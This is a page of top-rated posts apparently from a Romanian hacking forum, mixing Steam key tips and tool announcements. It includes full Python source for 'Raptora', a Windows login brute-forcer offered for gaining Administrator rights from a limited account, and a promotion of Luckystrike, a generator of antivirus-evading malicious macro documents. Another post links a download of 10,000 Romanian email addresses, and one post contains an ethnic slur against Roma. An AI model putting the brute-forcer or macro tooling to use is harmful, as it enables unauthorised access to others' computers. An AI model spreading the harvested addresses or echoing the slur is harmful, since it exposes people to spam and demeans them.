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Showing content with the highest reputation on 01/13/17 in all areas

  1. Ce trebuie sa faceti? 1. Trebuie sa aveti cont pe stream pentru a putea folosi key-ul si a conecta contul de steam cu cel de pe humblebundle.com 2. Intrati aici click pe butonul verde "Get it Free!" 3. Va conectati cu contul de humblebundle sau daca nu aveti va faceti unul (daca iti faci cont nou va trebui sa conectezi si contul de steam). 4. Dupa conectare dati pe butonul verde "Check out" 5. In continuare veti fi redirectionat pe o pagina unde va trebui sa dati rendee on steam 6. Dupa ce ati facut rost de key intrati pe steam si il activati.
    3 points
  2. Hi You recently downloaded a trial version of Acunetix. We are pleased to inform you that the manual web pen testing tools previously available in the paid product, are now being offered free of charge to download. Included in this suite of Manual Tools are: HTTP Editor - to create, analyze and edit client HTTP requests; as well as inspect server responses. HTTP Sniffer - to analyze HTTP requests and responses, and edit these while they are in transit. HTTP Fuzzer - to automatically send a large number of HTTP to test input validation and handling of invalid data by the web application. Blind SQL Injector - to test Blind SQL Injection vulnerabilities further Subdomain Scanner - to discover subdomains configured in its hierarchy and identifies any wildcard characters Target Finder - An IP range / port scanner which can be used to discover running web servers on a given IP or within a specified range of IPs. Authentication Tester - to test the strength of both usernames and passwords within HTTP and web forms authentication environments via a dictionary attack. Find out more in our Press Release DOWNLOAD the Free Manual Pen Testing Tools Today! Kind regards, Ian Muscat Product Communications Manager Acunetix
    2 points
  3. <tldr> Luckystrike is a PowerShell based generator of malicious .xls documents (soon to be .doc). All your payloads are saved into a database for easy retrieval & embedding into a new or existing document. Luckystrike provides you several infection methods designed to get your payloads to execute without tripping AV. See the "Installation" section below for instructions on getting started. </tldr> http://www.shellntel.com/blog/2016/9/13/luckystrike-a-database-backed-evil-macro-generator Enjoy!
    2 points
  4. PHP Secure Configuration Checker Check current PHP configuration for potential security flaws. Simply access this file from your webserver or run on CLI. Author This software was written by Ben Fuhrmannek, SektionEins GmbH, in an effort to automate php.ini checks and spend more time on cheerful tasks. Link: https://github.com/sektioneins/pcc
    1 point
  5. @Byte-ul cand mi-ai zis ca iti doresti laptopul asta si ti-am spus sa faci orice ca sa-l obtii nu m-am referit sa-l ciordesti bro ...
    1 point
  6. Salut. Raptora este un brute forcer pentru orice cont de Windows. Mai explicit, este pentru atunci cand aveti acces la un calculator pe un user limitat, si va doriti sa aveti drepturi de Administrator. Programul este foarte simplu, va intreaba care user vreti sa il incercati, va intreaba care fisier de parole vreti sa il folositi, apoi isi incepe treaba. Daca a gasit ceva bun, va afisa pe ecran SUCCESS: userul si parola. Am reusit sa il fac sa mearga si cu parole goale ( BLANK ). Este foarte rapid, pe un cpu decent, adica dual core in sus, cu aproape 1000 parole/secunda. Evitati sa specificati userul cu litere mari sau cu prima litera mare. Exemplu: folositi administrator in loc de Administrator. Daca aveti vreo idee pentru imbunatatire, sunt deschid la idei noi. Mai jos este codul sursa [Python] ################################## ##Windows Login Brute Force tool## ## Coded by BRENIN@RST ## ## Jabber: obelix@creep.im ## ################################## def verify_success(username, password): from win32security import LogonUser from win32con import LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT if password == 'BLANK': try: password = "" LogonUser(username, None, password, LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT) return True except Exception, e: if "blank passwords" in str(e): return True else: return False else: try: LogonUser(username, None, password, LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT) return True except Exception, e: return False u = raw_input('Enter the username you want to brute: ') fis = raw_input('Enter the password_list file: ') pwds = open(fis,'rU') passwds = pwds.readlines() for password in passwds: if password.rstrip() == "%user%": password = u.rstrip() if password.rstrip() == "%user%1": password = u.rstrip()+'1' if password.rstrip() == "%user%12": password = u.rstrip()+'12' if password.rstrip() == "%user%123": password = u.rstrip()+'123' if verify_success(u, password.rstrip()): print 'SUCCESS: => USERNAME: '+u+' '+'PASSWORD: '+password.rstrip() break else: print '[+]Trying: '+u+' '+password.rstrip() Mai jos este o varianta compilata cu py2exe pentru windows: https://mega.co.nz/#!EcEGXBLL!eiuSH2n0yh__ZIccVeKTuw3TWrUIXA1DoyuUPnQHsJ8 Astept idei pentru imbunatatire. Multumesc!
    1 point
  7. La munca cu voi nu la intins mana, tigani prosti si inculti ce sunteti.V-as urca intr-un vapor de carton si sayonara(goodbye :: la revedere) cu voi pe Marea Neagra arzand ca sobolanii aia din parlament.
    1 point
  8. pai mata nuti da ?i ?ie 3 lei atât de am?rât e?ti?
    1 point
  9. Depinde. Poate ai 2 picioare stangi. Ai grija sa nu te impiedici, sa cazi si pe urma sa te lovesti la ceas!
    -1 points
  10. De aici va puteti descarca 10k de adrese de email din Romania. Download:http://adf.ly/1hwxQ7
    -2 points
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